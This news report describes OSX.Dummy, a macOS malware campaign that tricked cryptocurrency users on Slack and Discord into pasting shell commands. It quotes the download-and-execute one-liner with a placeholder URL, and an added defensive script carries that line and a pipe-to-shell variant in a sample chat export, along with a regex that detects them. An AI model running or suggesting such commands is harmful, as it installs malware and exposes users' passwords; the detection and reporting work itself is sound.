Cybercriminals are targeting Slack and Discord users who discuss cryptocurrencies, SC Media UK reported on 2 July.
According to the report, researchers found several macOS malware campaigns aimed specifically at cryptocurrency-related discussions on Slack and Discord. The attackers join chat groups posing as administrators or "key people" and post "small snippets" of shell commands; users who follow the instructions and run them infect their own devices.
As SC Media UK reports, the malware can steal users' passwords and store them on the attackers' server, which Remco Verhoef believes is hosted in the Netherlands.
“When the code is installed it attempts to connect to a command and control (C&C) server owned by the attackers. If the connection to the C&C server succeeds, hackers can then remotely access the Mac and run code on it,” reported SC Media UK.
Running the following one-liner downloads a 34 MB 64-bit Mach-O binary into /tmp and executes it ($MALICIOUS_URL is a placeholder for the redacted download address):
cd /tmp && curl -s curl $MALICIOUS_URL > script && chmod +x script && ./script
Patrick Wardle, founder of Objective-See and Chief Research Officer at Digita Security, wrote on Friday on Objective-See that "apparently attackers are asking users to infect themselves" with a "rather massive machO binary." Wardle named the malware "OSX.Dummy" for the following reasons:
- “the infection method is dumb
- the massive size of the binary is dumb
- the persistence mechanism is lame (and thus also dumb)
- the capabilities are rather limited (and thus rather dumb)
- it’s trivial to detect at every step (that dumb)
- …and finally, the malware saves the user’s password to dumpdummy”
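Because the infection runs through a pasted shell one-liner and leaves plainly named files behind, both steps are easy to check for. The script below is an added example, not code from the article, SC Media UK or Objective-See: it flags chat messages carrying a download-and-run one-liner of the shape quoted above, and lists the on-disk traces the article names (the dropped /tmp/script and a file called dumpdummy). The sample chat export, the regular expression and the assumption that the artifacts keep those file names are mine.

```sh
#!/bin/sh
# Added example (not code from the article, SC Media UK or Objective-See): a
# small triage helper that (1) flags chat messages carrying a download-and-run
# one-liner of the kind described above and (2) looks for the on-disk traces
# the article names: the dropped /tmp/script and a file called dumpdummy.
# The sample messages, the regex and the file-name assumption are my own.

# Constructed sample chat export, not real Slack/Discord messages.
SAMPLE_CHAT='admin: wallet sync is broken, paste this in Terminal: cd /tmp && curl -s curl $MALICIOUS_URL > script && chmod +x script && ./script
alice: thanks! which wallet version is that for?
bob: brew install jq was enough for me
carol: or just: curl -fsSL http://example.invalid/fix.sh | sh'

# Two shapes of "download and execute" one-liner:
#   fetch > file && chmod +x file && ./file   (the pattern reported for OSX.Dummy)
#   fetch | sh                                (the common pipe-to-shell variant)
DROPPER_RE='(curl|wget)[^|]*(>[^|]*chmod[[:space:]]+\+x|\|[[:space:]]*(ba|z)?sh([^[:alnum:]_]|$))'

# flag_dropper_snippets TEXT: print each matching line prefixed with "SUSPECT: "
flag_dropper_snippets() {
    printf '%s\n' "$1" | grep -E "$DROPPER_RE" | sed 's/^/SUSPECT: /'
    return 0
}

# count_dropper_snippets TEXT: print the number of matching lines (0 when clean)
count_dropper_snippets() {
    printf '%s\n' "$1" | grep -Ec "$DROPPER_RE" || true
}

# find_dummy_artifacts [ROOT]: list the dropper and the password file if present.
# ROOT is an optional mounted-image root for offline triage; empty means the
# live system. Assumption: the artifacts keep the names the article gives.
find_dummy_artifacts() {
    root=${1%/}
    [ -f "$root/tmp/script" ] && printf '%s\n' "$root/tmp/script"
    find "${root:-/}" -xdev -type f -name dumpdummy 2>/dev/null
    return 0
}

flag_dropper_snippets "$SAMPLE_CHAT"
echo "suspicious snippets: $(count_dropper_snippets "$SAMPLE_CHAT")"
```

On a Mac suspected of infection, call find_dummy_artifacts with no argument (it walks the boot volume only, because of -xdev) or pass the root of a mounted disk image to triage it offline. The regex deliberately ignores legitimate pipelines such as curl ... | shasum, so a zero count is a reasonable "nothing pasted that executes a download", not proof the channel is clean.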
Analysts expect such attacks to improve over time and advise organisations to require multi-factor authentication so that only legitimate members can join their chat groups.
“We should expect such attacks to improve over time. As for organisations, they have some benefits in that they can typically control their network and environment more tightly than home users. In-house instances of such chat groups therefore can be rigorously checked for membership and the content being shared. Multi-factor authentication should be used to ensure that leaked or stolen credentials do not allow simply anyone to join an organisation’s chat room,” Alex Hinchliffe, an analyst at Unit 42, explained.